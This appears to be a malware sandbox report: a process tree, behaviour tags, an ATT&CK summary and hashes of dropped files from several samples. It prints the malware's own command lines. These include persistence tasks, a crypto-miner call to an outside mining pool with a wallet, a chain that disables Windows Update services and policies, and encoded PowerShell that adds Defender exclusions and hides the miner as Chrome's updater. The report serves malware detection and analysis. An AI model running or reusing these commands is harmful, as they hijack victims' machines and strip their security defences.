- Creates scheduled task(s)
-
C:\Windows\SysWOW64\explorer.exeC:\Windows\SysWOW64\explorer.exe1⤵
- Accesses Microsoft Outlook profiles
- outlook_office_path
- outlook_win_path
-
C:\Windows\explorer.exeC:\Windows\explorer.exe1⤵
-
C:\Users\Admin\AppData\Local\Temp\310A.exeC:\Users\Admin\AppData\Local\Temp\310A.exe1⤵
- Executes dropped EXE
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe"2⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 1164 -s 2762⤵
- Program crash
-
C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exeC:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe1⤵
- Executes dropped EXE
-
C:\Windows\SysWOW64\schtasks.exe/C /create /F /sc minute /mo 1 /tn "Azure-Update-Task" /tr "C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe"2⤵
- Creates scheduled task(s)
-
C:\Users\Admin\AppData\Local\Temp\406C.exeC:\Users\Admin\AppData\Local\Temp\406C.exe1⤵
- Executes dropped EXE
- Checks computer location settings
-
C:\Users\Admin\AppData\Roaming\EAEHCHcAAKSescACHUHCAAHKhACsKfCeCHhFCAHFAEehaheeHsAKhuh.exe"C:\Users\Admin\AppData\Roaming\EAEHCHcAAKSescACHUHCAAHKhACsKfCeCHhFCAHFAEehaheeHsAKhuh.exe"2⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\tmp4546.tmp.bat""3⤵
-
C:\Windows\system32\timeout.exetimeout 34⤵
- Delays execution with timeout.exe
-
C:\ProgramData\GhubSoftWalletTrust\LYKAA.exe"C:\ProgramData\GhubSoftWalletTrust\LYKAA.exe"4⤵
- Executes dropped EXE
- Checks computer location settings
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc MINUTE /mo 5 /RL HIGHEST /tn "LYKAA" /tr "C:\ProgramData\GhubSoftWalletTrust\LYKAA.exe"5⤵
-
C:\Windows\system32\schtasks.exeschtasks /create /f /sc MINUTE /mo 5 /RL HIGHEST /tn "LYKAA" /tr "C:\ProgramData\GhubSoftWalletTrust\LYKAA.exe"6⤵
- Creates scheduled task(s)
-
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\vbc.exeC:\Windows\Microsoft.NET\Framework64\v4.0.30319\vbc.exe -a verus -o stratum+tcp://na.luckpool.net:3956 -u RKsS6XcgidDNc8rU38Yiv5STQutyMUu9A4.installs001 -p x -t 65⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c cls6⤵
-
C:\Users\Admin\AppData\Local\Temp\57AE.exeC:\Users\Admin\AppData\Local\Temp\57AE.exe1⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Executes dropped EXE
- Checks BIOS information in registry
- Checks computer location settings
- Checks whether UAC is enabled
-
C:\Users\Admin\AppData\Local\Temp\RarSFX0\Browser Update.exe"C:\Users\Admin\AppData\Local\Temp\RarSFX0\Browser Update.exe"2⤵
- Executes dropped EXE
- Checks computer location settings
- Adds Run key to start application
- Drops file in Program Files directory
- Suspicious use of SetWindowsHookEx
-
C:\Program Files\Google\Chrome\Application\BrowserUpdate.exe"C:\Program Files\Google\Chrome\Application\BrowserUpdate.exe" -l google.sup1@yahoo.com3⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Executes dropped EXE
- Checks BIOS information in registry
- Checks computer location settings
- Checks whether UAC is enabled
- Suspicious use of SetWindowsHookEx
-
C:\Users\Admin\AppData\Local\Temp\626D.exeC:\Users\Admin\AppData\Local\Temp\626D.exe1⤵
- Executes dropped EXE
- Checks computer location settings
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\Temp\miner2.exe"C:\Windows\Temp\miner2.exe"2⤵
- Executes dropped EXE
- Checks computer location settings
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGUAZQAjAD4AIABBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGQAcABsAHUAIwA+ACAALQBFAHgAYwBsAHUAcwBpAG8AbgBQAGEAdABoACAAQAAoACQAZQBuAHYAOgBVAHMAZQByAFAAcgBvAGYAaQBsAGUALAAkAGUAbgB2ADoAUwB5AHMAdABlAG0ARAByAGkAdgBlACkAIAA8ACMAcQBpAGgAIwA+ACAALQBGAG8AcgBjAGUAIAA8ACMAZgB6AHMAIwA+AA=="3⤵
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop bits & sc stop dosvc & reg delete HKLM\SYSTEM\CurrentControlSet\Services\UsoSvc /f & reg delete HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc /f & reg delete HKLM\SYSTEM\CurrentControlSet\Services\wuauserv /f & reg delete HKLM\SYSTEM\CurrentControlSet\Services\bits /f & reg delete HKLM\SYSTEM\CurrentControlSet\Services\dosvc /f & takeown /f %SystemRoot%\System32\WaaSMedicSvc.dll & icacls %SystemRoot%\System32\WaaSMedicSvc.dll /grant *S-1-1-0:F /t /c /l /q & rename %SystemRoot%\System32\WaaSMedicSvc.dll WaaSMedicSvc_BAK.dll & reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v AUOptions /d 2 /t REG_DWORD /f & reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v AutoInstallMinorUpdates /d 0 /t REG_DWORD /f & reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v NoAutoUpdate /d 1 /t REG_DWORD /f & reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v NoAutoRebootWithLoggedOnUsers /d 1 /t REG_DWORD /f & SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\Automatic App Update" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\Scheduled Start" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\sih" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\sihboot" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistant" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistantCalendarRun" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistantWakeupRun" /DISABLE3⤵
-
C:\Windows\system32\sc.exesc stop UsoSvc4⤵
- Launches sc.exe
-
C:\Windows\system32\sc.exesc stop WaaSMedicSvc4⤵
- Launches sc.exe
-
C:\Windows\system32\sc.exesc stop wuauserv4⤵
- Launches sc.exe
-
C:\Windows\system32\sc.exesc stop bits4⤵
- Launches sc.exe
-
C:\Windows\system32\sc.exesc stop dosvc4⤵
- Launches sc.exe
-
C:\Windows\system32\reg.exereg delete HKLM\SYSTEM\CurrentControlSet\Services\UsoSvc /f4⤵
- Modifies registry key
-
C:\Windows\system32\reg.exereg delete HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc /f4⤵
- Modifies registry key
-
C:\Windows\system32\reg.exereg delete HKLM\SYSTEM\CurrentControlSet\Services\wuauserv /f4⤵
- Modifies registry key
-
C:\Windows\system32\reg.exereg delete HKLM\SYSTEM\CurrentControlSet\Services\bits /f4⤵
- Modifies registry key
-
C:\Windows\system32\reg.exereg delete HKLM\SYSTEM\CurrentControlSet\Services\dosvc /f4⤵
- Modifies registry key
-
C:\Windows\system32\takeown.exetakeown /f C:\Windows\System32\WaaSMedicSvc.dll4⤵
- Possible privilege escalation attempt
- Modifies file permissions
-
C:\Windows\system32\icacls.exeicacls C:\Windows\System32\WaaSMedicSvc.dll /grant *S-1-1-0:F /t /c /l /q4⤵
- Possible privilege escalation attempt
- Modifies file permissions
-
C:\Windows\system32\reg.exereg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v AUOptions /d 2 /t REG_DWORD /f4⤵
- Modifies registry key
-
C:\Windows\system32\reg.exereg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v AutoInstallMinorUpdates /d 0 /t REG_DWORD /f4⤵
- Modifies registry key
-
C:\Windows\system32\reg.exereg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v NoAutoUpdate /d 1 /t REG_DWORD /f4⤵
- Modifies registry key
-
C:\Windows\system32\reg.exereg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v NoAutoRebootWithLoggedOnUsers /d 1 /t REG_DWORD /f4⤵
- Modifies registry key
-
C:\Windows\system32\schtasks.exeSCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\Automatic App Update" /DISABLE4⤵
-
C:\Windows\system32\schtasks.exeSCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\Scheduled Start" /DISABLE4⤵
-
C:\Windows\system32\schtasks.exeSCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\sih" /DISABLE4⤵
-
C:\Windows\system32\schtasks.exeSCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\sihboot" /DISABLE4⤵
-
C:\Windows\system32\schtasks.exeSCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistant" /DISABLE4⤵
-
C:\Windows\system32\schtasks.exeSCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistantCalendarRun" /DISABLE4⤵
-
C:\Windows\system32\schtasks.exeSCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistantWakeupRun" /DISABLE4⤵
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c powercfg /x -hibernate-timeout-ac 0 & powercfg /x -hibernate-timeout-dc 0 & powercfg /x -standby-timeout-ac 0 & powercfg /x -standby-timeout-dc 03⤵
-
C:\Windows\system32\powercfg.exepowercfg /x -hibernate-timeout-ac 04⤵
-
C:\Windows\system32\powercfg.exepowercfg /x -hibernate-timeout-dc 04⤵
-
C:\Windows\system32\powercfg.exepowercfg /x -standby-timeout-ac 04⤵
-
C:\Windows\system32\powercfg.exepowercfg /x -standby-timeout-dc 04⤵
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAHIAYgAjAD4AIABSAGUAZwBpAHMAdABlAHIALQBTAGMAaABlAGQAdQBsAGUAZABUAGEAcwBrACAALQBBAGMAdABpAG8AbgAgACgATgBlAHcALQBTAGMAaABlAGQAdQBsAGUAZABUAGEAcwBrAEEAYwB0AGkAbwBuACAALQBFAHgAZQBjAHUAdABlACAAJwBwAG8AdwBlAHIAcwBoAGUAbABsACcAIAAtAEEAcgBnAHUAbQBlAG4AdAAgACcALQBFAG4AYwBvAGQAZQBkAEMAbwBtAG0AYQBuAGQAIAAiAFAAQQBBAGoAQQBHAFkAQQBkAEEAQQBqAEEARAA0AEEASQBBAEIAVABBAEgAUQBBAFkAUQBCAHkAQQBIAFEAQQBMAFEAQgBRAEEASABJAEEAYgB3AEIAagBBAEcAVQBBAGMAdwBCAHoAQQBDAEEAQQBMAFEAQgBHAEEARwBrAEEAYgBBAEIAbABBAEYAQQBBAFkAUQBCADAAQQBHAGcAQQBJAEEAQQBuAEEARQBNAEEATwBnAEIAYwBBAEYAQQBBAGMAZwBCAHYAQQBHAGMAQQBjAGcAQgBoAEEARwAwAEEASQBBAEIARwBBAEcAawBBAGIAQQBCAGwAQQBIAE0AQQBYAEEAQgBIAEEARwA4AEEAYgB3AEIAbgBBAEcAdwBBAFoAUQBCAGMAQQBFAE0AQQBhAEEAQgB5AEEARwA4AEEAYgBRAEIAbABBAEYAdwBBAGQAUQBCAHcAQQBHAFEAQQBZAFEAQgAwAEEARwBVAEEAYwBnAEEAdQBBAEcAVQBBAGUAQQBCAGwAQQBDAGMAQQBJAEEAQQB0AEEARgBZAEEAWgBRAEIAeQBBAEcASQBBAEkAQQBCAFMAQQBIAFUAQQBiAGcAQgBCAEEASABNAEEASQBBAEEAOABBAEMATQBBAGEAdwBCAHEAQQBIAGsAQQBJAHcAQQArAEEAQQA9AD0AIgAnACkAIAA8ACMAeABsACMAPgAgAC0AVAByAGkAZwBnAGUAcgAgACgATgBlAHcALQBTAGMAaABlAGQAdQBsAGUAZABUAGEAcwBrAFQAcgBpAGcAZwBlAHIAIAAtAEEAdABTAHQAYQByAHQAdQBwACkAIAA8ACMAZwBsAHAAbwAjAD4AIAAtAFMAZQB0AHQAaQBuAGcAcwAgACgATgBlAHcALQBTAGMAaABlAGQAdQBsAGUAZABUAGEAcwBrAFMAZQB0AHQAaQBuAGcAcwBTAGUAdAAgAC0AQQBsAGwAbwB3AFMAdABhAHIAdABJAGYATwBuAEIAYQB0AHQAZQByAGkAZQBzACAALQBEAGkAcwBhAGwAbABvAHcASABhAHIAZABUAGUAcgBtAGkAbgBhAHQAZQAgAC0ARABvAG4AdABTAHQAbwBwAEkAZgBHAG8AaQBuAGcATwBuAEIAYQB0AHQAZQByAGkAZQBzACAALQBEAG8AbgB0AFMAdABvAHAATwBuAEkAZABsAGUARQBuAGQAIAAtAEUAeABlAGMAdQB0AGkAbwBuAFQAaQBtAGUATABpAG0AaQB0ACAAKABOAGUAdwAtAFQAaQBtAGUAUwBwAGEAbgAgAC0ARABhAHkAcwAgADEAMAAwADAAKQApACAAPAAjAGgAeQBjAGgAIwA+ACAALQBUAGEAcwBrAE4AYQBtAGUAIAAnAEcAbwBvAGcAbABlAFUAcABkAGEAdABlAFQAYQBzAGsATQBhAGMAaABpAG4AZQBRAEMAJwAgAC0AVQBzAGUAcgAgACcAUwB5AHMAdABlAG0AJwAgAC0AUgB1AG4ATABlAHYAZQBsACAAJwBIAGkAZwBoAGUAcwB0ACcAIAAtAEYAbwByAGMAZQAgADwAIwBiAHYAawBjACMAPgA7ACAAQwBvAHAAeQAtAEkAdABlAG0AIAAnAEMAOgBcAFcAaQBuAGQAbwB3AHMAXABUAGUAbQBwAFwAbQBpAG4AZQByADIALgBlAHgAZQAnACAALQBEAGUAcwB0AGkAbgBhAHQAaQBvAG4AIAAnAEMAOgBcAFAAcgBvAGcAcgBhAG0AIABGAGkAbABlAHMAXABHAG8AbwBnAGwAZQBcAEMAaAByAG8AbQBlAFwAdQBwAGQAYQB0AGUAcgAuAGUAeABlACcAIAAtAEYAbwByAGMAZQAgADwAIwBzAGIAawBxACMAPgA7ACAAUwB0AGEAcgB0AC0AUwBjAGgAZQBkAHUAbABlAGQAVABhAHMAawAgADwAIwBuAHQAcABhACMAPgAgAC0AVABhAHMAawBOAGEAbQBlACAAJwBHAG8AbwBnAGwAZQBVAHAAZABhAHQAZQBUAGEAcwBrAE0AYQBjAGgAaQBuAGUAUQBDACcAOwA="3⤵
-
C:\Users\Admin\AppData\Local\Temp\6770.exeC:\Users\Admin\AppData\Local\Temp\6770.exe1⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 2540 -s 17642⤵
- Program crash
-
C:\Users\Admin\AppData\Local\Temp\852A.exeC:\Users\Admin\AppData\Local\Temp\852A.exe1⤵
- Executes dropped EXE
-
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegSvcs.exeC:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegSvcs.exe2⤵
-
C:\Users\Admin\AppData\Local\Temp\8932.exeC:\Users\Admin\AppData\Local\Temp\8932.exe1⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe"2⤵
-
C:\Windows\SysWOW64\explorer.exeC:\Windows\SysWOW64\explorer.exe1⤵
-
C:\Windows\explorer.exeC:\Windows\explorer.exe1⤵
-
C:\Windows\SysWOW64\explorer.exeC:\Windows\SysWOW64\explorer.exe1⤵
-
C:\Windows\explorer.exeC:\Windows\explorer.exe1⤵
-
C:\Windows\SysWOW64\explorer.exeC:\Windows\SysWOW64\explorer.exe1⤵
-
C:\Windows\SysWOW64\explorer.exeC:\Windows\SysWOW64\explorer.exe1⤵
-
C:\Windows\SysWOW64\explorer.exeC:\Windows\SysWOW64\explorer.exe1⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 496 -p 2540 -ip 25401⤵
-
C:\Windows\explorer.exeC:\Windows\explorer.exe1⤵
-
C:\Windows\SysWOW64\explorer.exeC:\Windows\SysWOW64\explorer.exe1⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 576 -p 1164 -ip 11641⤵
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXEC:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE -EncodedCommand "PAAjAGYAdAAjAD4AIABTAHQAYQByAHQALQBQAHIAbwBjAGUAcwBzACAALQBGAGkAbABlAFAAYQB0AGgAIAAnAEMAOgBcAFAAcgBvAGcAcgBhAG0AIABGAGkAbABlAHMAXABHAG8AbwBnAGwAZQBcAEMAaAByAG8AbQBlAFwAdQBwAGQAYQB0AGUAcgAuAGUAeABlACcAIAAtAFYAZQByAGIAIABSAHUAbgBBAHMAIAA8ACMAawBqAHkAIwA+AA=="1⤵
Network
MITRE ATT&CK Matrix ATT&CK v6
Persistence
Modify Existing Service
1Registry Run Keys / Startup Folder
1Scheduled Task
1Defense Evasion
Virtualization/Sandbox Evasion
1Impair Defenses
1File Permissions Modification
1Scripting
1Modify Registry
2Replay Monitor
Loading Replay Monitor...
Downloads
-
C:\Program Files\Google\Chrome\Application\BrowserUpdate.exeFilesize
9.9MB
MD5fa0733b9fea77460a5c006e384779577
SHA1d34ad581d313b353c1f74209fcc8a659f236f79a
SHA256b439153b2144bb1566c0454cf563d54d7bcd6983488555bdc170f0414f60d2bd
SHA512efec566a345a318fff8cece6f41d7db29263b3ac0bd95b15603148ed9c02a4122821827eb1e0cbcc25335d9d37910c1da098a2f46bf2b78efea92d37e95b193b
-
C:\Program Files\Google\Chrome\Application\BrowserUpdate.exeFilesize
9.9MB
MD5fa0733b9fea77460a5c006e384779577
SHA1d34ad581d313b353c1f74209fcc8a659f236f79a
SHA256b439153b2144bb1566c0454cf563d54d7bcd6983488555bdc170f0414f60d2bd
SHA512efec566a345a318fff8cece6f41d7db29263b3ac0bd95b15603148ed9c02a4122821827eb1e0cbcc25335d9d37910c1da098a2f46bf2b78efea92d37e95b193b
-
C:\ProgramData\GhubSoftWalletTrust\LYKAA.exeFilesize
836KB
MD5edb6463d39eb1305c07400d169a40eba
SHA1456f4da4c204f7dd77af1834275213f663128e11
SHA256b0319fee29612b6f40ee9a9368cc23273c233547d9b1aa3bb551f8b57496ceb9
SHA512ab03697252ef332f4c8373bc47e3584302b58d3b314cecf9f9f39b3bbc7b1771080671185c4d29d57b1cfcc605afe70132ece7667d638a64096853e6d7c72306
-
C:\ProgramData\GhubSoftWalletTrust\LYKAA.exeFilesize
836KB
MD5edb6463d39eb1305c07400d169a40eba
SHA1456f4da4c204f7dd77af1834275213f663128e11
SHA256b0319fee29612b6f40ee9a9368cc23273c233547d9b1aa3bb551f8b57496ceb9
SHA512ab03697252ef332f4c8373bc47e3584302b58d3b314cecf9f9f39b3bbc7b1771080671185c4d29d57b1cfcc605afe70132ece7667d638a64096853e6d7c72306
-
C:\ProgramData\mozglue.dllFilesize
593KB
MD5c8fd9be83bc728cc04beffafc2907fe9
SHA195ab9f701e0024cedfbd312bcfe4e726744c4f2e
SHA256ba06a6ee0b15f5be5c4e67782eec8b521e36c107a329093ec400fe0404eb196a
SHA512fbb446f4a27ef510e616caad52945d6c9cc1fd063812c41947e579ec2b54df57c6dc46237ded80fca5847f38cbe1747a6c66a13e2c8c19c664a72be35eb8b040
-
C:\ProgramData\nss3.dllFilesize
2.0MB
MD51cc453cdf74f31e4d913ff9c10acdde2
SHA16e85eae544d6e965f15fa5c39700fa7202f3aafe
SHA256ac5c92fe6c51cfa742e475215b83b3e11a4379820043263bf50d4068686c6fa5
SHA512dd9ff4e06b00dc831439bab11c10e9b2ae864ea6e780d3835ea7468818f35439f352ef137da111efcdf2bb6465f6ca486719451bf6cf32c6a4420a56b1d64571
-
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\07CEF2F654E3ED6050FFC9B6EB844250_3431D4C539FB2CFCB781821E9902850DFilesize
2KB
MD5b00f59ce59a95f5fe629aff007e982fa
SHA18eb54eb49c540b80dba22e0a863f8122b48df410
SHA256d3559d4f89073b9bd7764d42e0fd258f78d98b5344af368056696f5fb6a87c46
SHA5126317a36087f2166e5a77a5761d7ad662c76b2989840af4e89e8a93845c8c7f47e6a26341be77db39ca687aacb5e50ad3730a5ee4b6d76669637b676a31b0efb3
-
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\B2FAF7692FD9FFBD64EDE317E42334BA_D7393C8F62BDE4D4CB606228BC7A711EFilesize
1KB
MD59943ca8035a49104bcf439b0b5709ba9
SHA1c093958b52d77399cdca68aad9f3caaf8b7e1ee0
SHA2567c47af0f9d8130cd4dad283a4d1d0e7a0b4faffa346b5bcace6b3d53d6a7ac5c
SHA5124be5b90783c87600d8d421959f0c5b36a97ac6d64d9e1e497056bd016d5cc9e141a55ca8632c8b3e5c5b936a4b0a46295aa951c40470a77fa4ec85ad45d64227
-
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\07CEF2F654E3ED6050FFC9B6EB844250_3431D4C539FB2CFCB781821E9902850DFilesize
488B
MD5621d4abbbd0282d8f84c05fcdc32df54
SHA163593cb55c5d12a6fd013fe5d46a3fff7ccdc385
SHA2566e819becac707e8cb4128c7f0dbe44d03a9385b1a5ff0ffd20017950c80b9b45
SHA51206d1a2b20468cce566153f5ccd529e8ef6ba61bb7c6fa293b557b09f85b1319820430790e8daa3477d2b9ab9dd02c13fe8a211760973eeb3c0e0d41a0dcd33cc
-
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\B2FAF7692FD9FFBD64EDE317E42334BA_D7393C8F62BDE4D4CB606228BC7A711EFilesize
482B
MD5b8e335231593af7119556fa8d2c5d275
SHA1ec009471989edf64885961b8f093aef179baf83e
SHA256f7a038bcdde71958256ec6073a0888d30fe3b1d5eca0215fcabf6734504bb9c6
SHA5124adbc7d24d88133a89ab2f09a298f6bbcc3828797b69446c34eb2faccebc43efffa28a59ceb363110ee8e4d3d0adc120ea516f49d80c7ef8f0ef71bf976f614b
-
C:\Users\Admin\AppData\Local\8c5ef99b-dbe7-400b-ab96-5850ccd27ad1\D2EB.exeFilesize
692KB
MD5ea99118a912c06a222d64b07b3c7a15f
SHA1ac7bb96e9f47e367b41c9622f961d9ed2c75a06c
SHA256d162d3556029e336c8075bc5df7ddf2e853538f41de04fef16a826333ff6a68d
SHA512ace900ec5de05805ce3bceaa23e1716f07005d64a96d603cb5aad7860e8023e3a078cd0891d6169fe741f87552bd7dd761b93c3e612ce257e6352ed0bb2d598a
-
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.logFilesize
2KB
MD5d85ba6ff808d9e5444a4b369f5bc2730
SHA131aa9d96590fff6981b315e0b391b575e4c0804a
SHA25684739c608a73509419748e4e20e6cc4e1846056c3fe1929a8300d5a1a488202f
SHA5128c414eb55b45212af385accc16d9d562adba2123583ce70d22b91161fe878683845512a78f04dedd4ea98ed9b174dbfa98cf696370598ad8e6fbd1e714f1f249
-
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\vbc.exe.logFilesize
2KB
MD5467e33722458ccc9dd774bee4132446a
SHA1787f5f211299ef097f3640d964711a42d5465280
SHA256af8285f93b2846eb221831e8dbf92fd72005e246af67f40035b12c4065685289
SHA512897f362ad8be6e1538f682ec94007406f0f74b1ce4ab264cc029b140b0d101ee8e825106f95d03d2e3ce77445038524579c18ffb51e2b6e1274efdbf2501c317
-
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractiveFilesize
944B
MD5d28a889fd956d5cb3accfbaf1143eb6f
SHA1157ba54b365341f8ff06707d996b3635da8446f7
SHA25621e5d7ccf80a293e6ba30ed728846ca19c929c52b96e2c8d34e27cd2234f1d45
SHA5120b6d88deb9be85722e6a78d5886d49f2caf407a59e128d2b4ed74c1356f9928c40048a62731959f2460e9ff9d9feee311043d2a37abe3bb92c2b76a44281478c
-
C:\Users\Admin\AppData\Local\Temp\310A.exeFilesize
218KB
MD53de8df56c864e0f5a715f0a1e9383c48
SHA1c4d5f366616430ecc5ab0123803b7586fcd90943
SHA2563f4a2d676bc1ad155e33f1e5e6c2a19a7d3cd37ba9b30bfaffdf6e1a37456290
SHA51288639641215375669dc56a5b0504b247b089848abcd0a2a901090f026f26928d8e5933b756fe9400f62f5579b94c7bc22e18fe83c25a99268686cca0ab29fdbc
-
C:\Users\Admin\AppData\Local\Temp\310A.exeFilesize
218KB
MD53de8df56c864e0f5a715f0a1e9383c48
SHA1c4d5f366616430ecc5ab0123803b7586fcd90943
SHA2563f4a2d676bc1ad155e33f1e5e6c2a19a7d3cd37ba9b30bfaffdf6e1a37456290
SHA51288639641215375669dc56a5b0504b247b089848abcd0a2a901090f026f26928d8e5933b756fe9400f62f5579b94c7bc22e18fe83c25a99268686cca0ab29fdbc
-
C:\Users\Admin\AppData\Local\Temp\406C.exeFilesize
1.1MB
MD5ae30203171ea1b8be4017efcab8dd23e
SHA1597c1cbc27659181318bd9d4f44fcd55abc4e36e
SHA256a232ab45ccd355e5ba96a254edcc53deb2bcbf154610732b444cb5d6d07ce401
SHA512b1a963f6b0953673145191540e22d9eee4039efccbb8bf153517ba63257a056000a15fd52edf4c6a2dd572cca5267d675a174694c694e408d9a006e4dc933f04
-
C:\Users\Admin\AppData\Local\Temp\406C.exeFilesize
1.1MB
MD5ae30203171ea1b8be4017efcab8dd23e
SHA1597c1cbc27659181318bd9d4f44fcd55abc4e36e
SHA256a232ab45ccd355e5ba96a254edcc53deb2bcbf154610732b444cb5d6d07ce401
SHA512b1a963f6b0953673145191540e22d9eee4039efccbb8bf153517ba63257a056000a15fd52edf4c6a2dd572cca5267d675a174694c694e408d9a006e4dc933f04
-
C:\Users\Admin\AppData\Local\Temp\57AE.exeFilesize
9.0MB
MD5c47c7dfe045ceacd443ec8c7d120ba0a
SHA151cd904e7a4e48a2e4d78f27e3d565f1e76278d4
SHA2569ccd93137d9574e16bb2a94b9725981c65a7b1dcc295f5ed31f4a5c76b11cbdb
SHA512fc36364aee5ade506c24d798b871f81d23f7e2774b14b439ef811f65d0e395d915e76c36267ef1d1b7974da7e92850aa129cc9c50f9e6c7ada1549c6971dd100
-
C:\Users\Admin\AppData\Local\Temp\57AE.exeFilesize
9.0MB
MD5c47c7dfe045ceacd443ec8c7d120ba0a
SHA151cd904e7a4e48a2e4d78f27e3d565f1e76278d4
SHA2569ccd93137d9574e16bb2a94b9725981c65a7b1dcc295f5ed31f4a5c76b11cbdb
SHA512fc36364aee5ade506c24d798b871f81d23f7e2774b14b439ef811f65d0e395d915e76c36267ef1d1b7974da7e92850aa129cc9c50f9e6c7ada1549c6971dd100
-
C:\Users\Admin\AppData\Local\Temp\626D.exeFilesize
2.6MB
MD5b5d020046c84c4cc22ce979dce7b53bf
SHA1a76f5ea5ab510492f4e322fece1e826c16955045
SHA2566ed222056c77a040d7efc411380ebc607a089181b11a126a11eefbc64b0b3e28
SHA512a834168b2e9475265b7f1b44d1606570119deaa0bd6bd5dbc36e9b7beb015393d03fecdad8e0fd15364c3fc004173f55a307e81623e651aab5c191fd3f929b2d
-
C:\Users\Admin\AppData\Local\Temp\626D.exeFilesize
2.6MB
MD5b5d020046c84c4cc22ce979dce7b53bf
SHA1a76f5ea5ab510492f4e322fece1e826c16955045
SHA2566ed222056c77a040d7efc411380ebc607a089181b11a126a11eefbc64b0b3e28
SHA512a834168b2e9475265b7f1b44d1606570119deaa0bd6bd5dbc36e9b7beb015393d03fecdad8e0fd15364c3fc004173f55a307e81623e651aab5c191fd3f929b2d
-
C:\Users\Admin\AppData\Local\Temp\6770.exeFilesize
305KB
MD535779d59a1f6b51cb48da287bfe9d73a
SHA176969d25352c593c3e23c174c5e13c05a2581102
SHA256f1261c243571ade17ac5cd0ffc64738c4ead5c59e4ca9324062f05d1adf8d3b2
SHA512d72f8c4e7960027cbeae0bc41d7a1be6f23f3712534052c8cd65702337cb406c0a3d4e1311c27834890c534b0612888b88e9e244e3f9b89aab2c7053da02aab1
-
C:\Users\Admin\AppData\Local\Temp\6770.exeFilesize
305KB
MD535779d59a1f6b51cb48da287bfe9d73a
SHA176969d25352c593c3e23c174c5e13c05a2581102
SHA256f1261c243571ade17ac5cd0ffc64738c4ead5c59e4ca9324062f05d1adf8d3b2
